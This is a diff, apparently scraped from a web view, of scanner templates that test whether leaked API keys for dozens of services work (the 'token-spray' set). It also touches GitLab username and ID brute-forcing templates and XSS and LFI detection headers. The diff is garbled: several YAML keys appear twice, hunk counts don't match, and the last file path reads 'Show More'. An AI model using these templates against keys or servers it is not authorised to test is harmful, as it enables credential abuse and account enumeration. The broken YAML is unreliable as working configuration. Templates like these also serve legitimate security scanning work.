+++ b/token-spray/buildkite.yaml
@ -7,6 +7,7 @@ info:
  severity: info
  tags: token-spray,buildkite
 self-contained: true
 requests:
  - method: GET
    path:
--- a/token-spray/buttercms.yaml
+++ b/token-spray/buttercms.yaml
@ -7,6 +7,7 @@ info:
  severity: info
  tags: token-spray,buttercms
 self-contained: true
 requests:
  - method: GET
    path:
--- a/token-spray/calendly.yaml
+++ b/token-spray/calendly.yaml
@ -7,6 +7,7 @@ info:
  severity: info
  tags: token-spray,calendly
 self-contained: true
 requests:
  - method: GET
    path:
--- a/token-spray/circleci.yaml
+++ b/token-spray/circleci.yaml
@ -7,6 +7,7 @@ info:
  severity: info
  tags: token-spray,circle,circleci
 self-contained: true
 requests:
  - method: GET
    path:
--- a/token-spray/deviantart.yaml
+++ b/token-spray/deviantart.yaml
@ -7,6 +7,7 @@ info:
  severity: info
  tags: token-spray,deviantart
 self-contained: true
 requests:
  - method: POST
    path:
--- a/token-spray/dropbox.yaml
+++ b/token-spray/dropbox.yaml
@ -7,6 +7,7 @@ info:
  severity: info
  tags: token-spray,dropbox
 self-contained: true
 requests:
  - method: POST
    path:
--- a/token-spray/github.yaml
+++ b/token-spray/github.yaml
@ -7,6 +7,7 @@ info:
  severity: info
  tags: token-spray,github
 self-contained: true
 requests:
  - method: GET
    path:
--- a/token-spray/google-autocomplete.yaml
+++ b/token-spray/google-autocomplete.yaml
@ -6,6 +6,7 @@ info:
  severity: info
  tags: token-spray,google,autocomplete
 self-contained: true
 requests:
  - method: GET
    path:
--- a/token-spray/google-customsearch.yaml
+++ b/token-spray/google-customsearch.yaml
@ -6,6 +6,7 @@ info:
  severity: info
  tags: token-spray,google,search
 self-contained: true
 requests:
  - method: GET
    path:
--- a/token-spray/google-directions.yaml
+++ b/token-spray/google-directions.yaml
@ -6,6 +6,7 @@ info:
  severity: info
  tags: token-spray,google,directions
 self-contained: true
 requests:
  - method: GET
    path:
--- a/token-spray/google-elevation.yaml
+++ b/token-spray/google-elevation.yaml
@ -6,6 +6,7 @@ info:
  severity: info
  tags: token-spray,google,elevation
 self-contained: true
 requests:
  - method: GET
    path:
--- a/token-spray/google-fcm.yaml
+++ b/token-spray/google-fcm.yaml
@ -6,6 +6,7 @@ info:
  severity: info
  tags: token-spray,google,fcm,firebase,cloud,messaging
 self-contained: true
 requests:
  - method: POST
    path:
--- a/token-spray/google-findplacefromtext.yaml
+++ b/token-spray/google-findplacefromtext.yaml
@ -6,6 +6,7 @@ info:
  severity: info
  tags: token-spray,google,find,text
 self-contained: true
 requests:
  - method: GET
    path:
--- a/token-spray/google-gedistancematrix.yaml
+++ b/token-spray/google-gedistancematrix.yaml
@ -6,6 +6,7 @@ info:
  severity: info
  tags: token-spray,google,distance,matrix
 self-contained: true
 requests:
  - method: GET
    path:
--- a/token-spray/google-geocode.yaml
+++ b/token-spray/google-geocode.yaml
@ -6,6 +6,7 @@ info:
  severity: info
  tags: token-spray,google,geocode
 self-contained: true
 requests:
  - method: GET
    path:
--- a/token-spray/google-geolocation.yaml
+++ b/token-spray/google-geolocation.yaml
@ -6,19 +6,21 @@ info:
  severity: info
  tags: token-spray,google,geolocation
 self-contained: true
 requests:
  - method: GET
    path:
      - "https://www.googleapis.com/geolocation/v1/geolocate?key={{token}}"
    matchers-condition: and
    matchers-condition: and
    matchers:
      - type: word
        part: body
        negative: true
        words:
          - 'error'
-        negative: true
+
      - type: status
        negative: true
        status:
          - 404
        negative: true
--- a/token-spray/google-mapsembed.yaml
+++ b/token-spray/google-mapsembed.yaml
@ -6,6 +6,7 @@ info:
  severity: info
  tags: token-spray,google,maps,embed
 self-contained: true
 requests:
  - method: GET
    path:
--- a/token-spray/google-mapsembedadvanced.yaml
+++ b/token-spray/google-mapsembedadvanced.yaml
@ -6,6 +6,7 @@ info:
  severity: info
  tags: token-spray,google,maps,embed
 self-contained: true
 requests:
  - method: GET
    path:
--- a/token-spray/google-nearbysearch.yaml
+++ b/token-spray/google-nearbysearch.yaml
@ -6,6 +6,7 @@ info:
  severity: info
  tags: token-spray,google,search,nearby
 self-contained: true
 requests:
  - method: GET
    path:
--- a/token-spray/google-nearestroads.yaml
+++ b/token-spray/google-nearestroads.yaml
@ -6,6 +6,7 @@ info:
  severity: info
  tags: token-spray,google,roads
 self-contained: true
 requests:
  - method: GET
    path:
--- a/token-spray/google-placedetails.yaml
+++ b/token-spray/google-placedetails.yaml
@ -6,6 +6,7 @@ info:
  severity: info
  tags: token-spray,google,place,details
 self-contained: true
 requests:
  - method: GET
    path:
--- a/token-spray/google-placesphoto.yaml
+++ b/token-spray/google-placesphoto.yaml
@ -6,6 +6,7 @@ info:
  severity: info
  tags: token-spray,google,places,photo
 self-contained: true
 requests:
  - method: GET
    path:
--- a/token-spray/google-playablelocations.yaml
+++ b/token-spray/google-playablelocations.yaml
@ -6,6 +6,7 @@ info:
  severity: info
  tags: token-spray,google,playable,locations
 self-contained: true
 requests:
  - method: GET
    path:
--- a/token-spray/google-routetotraveled.yaml
+++ b/token-spray/google-routetotraveled.yaml
@ -6,6 +6,7 @@ info:
  severity: info
  tags: token-spray,google,route
 self-contained: true
 requests:
  - method: GET
    path:
--- a/token-spray/google-speedlimit.yaml
+++ b/token-spray/google-speedlimit.yaml
@ -6,6 +6,7 @@ info:
  severity: info
  tags: token-spray,google,speed,limit
 self-contained: true
 requests:
  - method: GET
    path:
--- a/token-spray/google-staticmaps.yaml
+++ b/token-spray/google-staticmaps.yaml
@ -6,6 +6,7 @@ info:
  severity: info
  tags: token-spray,google,maps
 self-contained: true
 requests:
  - method: GET
    path:
--- a/token-spray/google-streetview.yaml
+++ b/token-spray/google-streetview.yaml
@ -6,6 +6,7 @@ info:
  severity: info
  tags: token-spray,google,streetview
 self-contained: true
 requests:
  - method: GET
    path:
--- a/token-spray/google-timezone.yaml
+++ b/token-spray/google-timezone.yaml
@ -6,6 +6,7 @@ info:
  severity: info
  tags: token-spray,google,timezone
 self-contained: true
 requests:
  - method: GET
    path:
--- a/token-spray/googlet-extsearchplaces.yaml
+++ b/token-spray/googlet-extsearchplaces.yaml
@ -6,6 +6,7 @@ info:
  severity: info
  tags: token-spray,google,search,places,text
 self-contained: true
 requests:
  - method: GET
    path:
@ -14,6 +15,6 @@ requests:
    matchers:
      - type: word
        part: body
        negative: true
        words:
          - 'error_message'
        negative: true
--- a/token-spray/heroku.yaml
+++ b/token-spray/heroku.yaml
@ -7,6 +7,7 @@ info:
  severity: info
  tags: token-spray,heroku
 self-contained: true
 requests:
  - method: POST
    path:
@ -17,9 +18,9 @@ requests:
    matchers:
      - type: status
        condition: or
        status:
          - 200
          - 201
          - 202
          - 206
        condition: or
--- a/token-spray/hubspot.yaml
+++ b/token-spray/hubspot.yaml
@ -7,6 +7,7 @@ info:
  severity: info
  tags: token-spray,hubspot
 self-contained: true
 requests:
  - method: GET
    path:
--- a/token-spray/instagram.yaml
+++ b/token-spray/instagram.yaml
@ -7,6 +7,7 @@ info:
  severity: info
  tags: token-spray,instagram,graph
 self-contained: true
 requests:
  - method: GET
    path:
--- a/token-spray/ipstack.yaml
+++ b/token-spray/ipstack.yaml
@ -7,6 +7,7 @@ info:
  severity: info
  tags: token-spray,ipstack
 self-contained: true
 requests:
  - method: GET
    path:
--- a/token-spray/iterable.yaml
+++ b/token-spray/iterable.yaml
@ -7,6 +7,7 @@ info:
  severity: info
  tags: token-spray,iterable
 self-contained: true
 requests:
  - method: GET
    path:
--- a/token-spray/jumpcloud.yaml
+++ b/token-spray/jumpcloud.yaml
@ -7,6 +7,7 @@ info:
  severity: info
  tags: token-spray,jumpcloud
 self-contained: true
 requests:
  - method: GET
    path:
--- a/token-spray/lokalise.yaml
+++ b/token-spray/lokalise.yaml
@ -7,6 +7,7 @@ info:
  severity: info
  tags: token-spray,lokalise
 self-contained: true
 requests:
  - method: GET
    path:
--- a/token-spray/loqate.yaml
+++ b/token-spray/loqate.yaml
@ -7,6 +7,7 @@ info:
  severity: info
  tags: token-spray,loqate
 self-contained: true
 requests:
  - method: GET
    path:
--- a/token-spray/mailchimp.yaml
+++ b/token-spray/mailchimp.yaml
@ -7,6 +7,7 @@ info:
  severity: info
  tags: token-spray,mailchimp
 self-contained: true
 network:
  - inputs:
      - data: "AUTH PLAIN {{base64(hex_decode('00')+'apikey'+hex_decode('00')+token)}}\r\n"
--- a/token-spray/mailgun.yaml
+++ b/token-spray/mailgun.yaml
@ -7,6 +7,7 @@ info:
  severity: info
  tags: token-spray,mailgun
 self-contained: true
 requests:
  - method: GET
    path:
--- a/token-spray/mapbox.yaml
+++ b/token-spray/mapbox.yaml
@ -7,6 +7,7 @@ info:
  severity: info
  tags: token-spray,mapbox
 self-contained: true
 requests:
  - method: GET
    path:
--- a/token-spray/nerdgraph.yaml
+++ b/token-spray/nerdgraph.yaml
@ -7,6 +7,7 @@ info:
  severity: info
  tags: token-spray,newrelic,nerdgraph
 self-contained: true
 requests:
  - method: POST
    path:
--- a/token-spray/npm.yaml
+++ b/token-spray/npm.yaml
@ -7,6 +7,7 @@ info:
  severity: info
  tags: token-spray,node,npm,package,manager
 self-contained: true
 requests:
  - method: GET
    path:
--- a/token-spray/openweather.yaml
+++ b/token-spray/openweather.yaml
@ -7,6 +7,7 @@ info:
  severity: info
  tags: token-spray,weather,openweather
 self-contained: true
 requests:
  - method: GET
    path:
--- a/token-spray/pagerduty.yaml
+++ b/token-spray/pagerduty.yaml
@ -7,6 +7,7 @@ info:
  severity: info
  tags: token-spray,pagerduty
 self-contained: true
 requests:
  - method: GET
    path:
--- a/token-spray/pendo.yaml
+++ b/token-spray/pendo.yaml
@ -7,6 +7,7 @@ info:
  severity: info
  tags: token-spray,pendo
 self-contained: true
 requests:
  - method: GET
    path:
--- a/token-spray/pivotaltracker.yaml
+++ b/token-spray/pivotaltracker.yaml
@ -7,6 +7,7 @@ info:
  severity: info
  tags: token-spray,pivotaltracker
 self-contained: true
 requests:
  - method: GET
    path:
--- a/token-spray/postmark.yaml
+++ b/token-spray/postmark.yaml
@ -7,6 +7,7 @@ info:
  severity: info
  tags: token-spray,postmark
 self-contained: true
 requests:
  - method: GET
    path:
--- a/token-spray/sendgrid.yaml
+++ b/token-spray/sendgrid.yaml
@ -7,6 +7,7 @@ info:
  severity: info
  tags: token-spray,sendgrid
 self-contained: true
 network:
  - inputs:
      - data: "ehlo\r\n"
--- a/token-spray/slack.yaml
+++ b/token-spray/slack.yaml
@ -7,6 +7,7 @@ info:
  severity: info
  tags: token-spray,slack
 self-contained: true
 requests:
  - method: POST
    path:
--- a/token-spray/sonarcloud.yaml
+++ b/token-spray/sonarcloud.yaml
@ -7,6 +7,7 @@ info:
  severity: info
  tags: token-spray,sonarcloud
 self-contained: true
 requests:
  - method: GET
    path:
--- a/token-spray/spotify.yaml
+++ b/token-spray/spotify.yaml
@ -7,6 +7,7 @@ info:
  severity: info
  tags: token-spray,spotify
 self-contained: true
 requests:
  - method: GET
    path:
--- a/token-spray/square.yaml
+++ b/token-spray/square.yaml
@ -7,6 +7,7 @@ info:
  severity: info
  tags: token-spray,square
 self-contained: true
 requests:
  - method: GET
    path:
--- a/token-spray/stripe.yaml
+++ b/token-spray/stripe.yaml
@ -7,6 +7,7 @@ info:
  severity: info
  tags: token-spray,stripe
 self-contained: true
 requests:
  - method: GET
    path:
--- a/token-spray/tinypng.yaml
+++ b/token-spray/tinypng.yaml
@ -7,6 +7,7 @@ info:
  severity: info
  tags: token-spray,tinypng
 self-contained: true
 requests:
  - method: POST
    path:
--- a/token-spray/travisci.yaml
+++ b/token-spray/travisci.yaml
@ -7,6 +7,7 @@ info:
  severity: info
  tags: token-spray,travis
 self-contained: true
 requests:
  - method: GET
    path:
--- a/token-spray/twitter.yaml
+++ b/token-spray/twitter.yaml
@ -7,6 +7,7 @@ info:
  severity: info
  tags: token-spray,twitter
 self-contained: true
 requests:
  - method: GET
    path:
--- a/token-spray/visualstudio.yaml
+++ b/token-spray/visualstudio.yaml
@ -7,6 +7,7 @@ info:
  severity: info
  tags: token-spray,visualstudio,microsoft
 self-contained: true
 requests:
  - method: GET
    path:
--- a/token-spray/wakatime.yaml
+++ b/token-spray/wakatime.yaml
@ -7,6 +7,7 @@ info:
  severity: info
  tags: token-spray,wakatime
 self-contained: true
 requests:
  - method: GET
    path:
--- a/token-spray/weglot.yaml
+++ b/token-spray/weglot.yaml
@ -7,6 +7,7 @@ info:
  severity: info
  tags: token-spray,weglot
 self-contained: true
 requests:
  - method: POST
    path:
--- a/token-spray/youtube.yaml
+++ b/token-spray/youtube.yaml
@ -7,17 +7,19 @@ info:
  severity: info
  tags: token-spray,youtube
 self-contained: true
 requests:
  - method: GET
    path:
      - "https://www.googleapis.com/youtube/v3/activities?part=contentDetails&maxResults=25&channelId=UC-lHJZR3Gqxm24_Vd_AJ5Yw&key={{token}}"
    matchers-condition: or
    matchers-condition: or
    matchers:
      - type: word
        part: body
        words:
          - 'quotaExceeded'
      - type: status
        status:
          - 200
--- a/vulnerabilities/gitlab/gitlab-user-enumeration.yaml
+++ b/vulnerabilities/gitlab/gitlab-user-enumeration.yaml
@ -16,10 +16,9 @@ requests:
        Accept: application/json, text/plain, */*
        Referer: {{BaseURL}}
    threads: 50
    payloads:
      user: helpers/wordlists/user-list.txt
    attack: sniper
    threads: 50
    matchers-condition: and
    matchers:
--- a/vulnerabilities/gitlab/gitlab-user-open-api.yaml
+++ b/vulnerabilities/gitlab/gitlab-user-open-api.yaml
@ -15,10 +15,9 @@ requests:
        Accept: application/json, text/plain, */*
        Referer: {{BaseURL}}
    threads: 50
    payloads:
      uid: helpers/wordlists/numbers.txt
    attack: sniper
    threads: 50
    matchers-condition: and
    matchers:
--- a/vulnerabilities/oracle/oracle-siebel-xss.yaml
+++ b/vulnerabilities/oracle/oracle-siebel-xss.yaml
@ -4,6 +4,7 @@ info:
  name: Oracle Siebel Loyalty 8.1 - XSS Vulnerability
  author: dhiyaneshDK
  severity: medium
  description: A vulnerability in Oracle Siebel Loyalty allows remote unauthenticated attackers to inject arbitary Javascript code into the responses returned by the '/loyalty_enu/start.swe/' endpoint.
  reference: https://packetstormsecurity.com/files/86721/Oracle-Siebel-Loyalty-8.1-Cross-Site-Scripting.html
  tags: xss,oracle
--- a/vulnerabilities/other/cs-cart-unauthenticated-lfi.yaml
+++ b/vulnerabilities/other/cs-cart-unauthenticated-lfi.yaml
@ -4,6 +4,7 @@ info:
  name: CS-Cart unauthenticated LFI
  author: 0x_Akoko
  severity: high
  description: A vulnerability in CS-Cart allows remote unauthenticated attackers to access locally stored files and reveal their content.
  reference: https://cxsecurity.com/issue/WLB-2020100100
  tags: cscart,lfi
--- a/vulnerabilities/other/lucee-xss.yaml
+++ b/vulnerabilities/other/lucee-xss.yaml
@ -4,6 +4,7 @@ info:
  name: Lucee Unauthenticated Reflected XSS
  author: incogbyte
  severity: medium
  description: A vulnerability in Lucee allows remote attackers to inject arbitrary Javascript into the responses returned by the server.
  tags: lucee,xss
 requests:
--- a/Show More
+++ b/Show More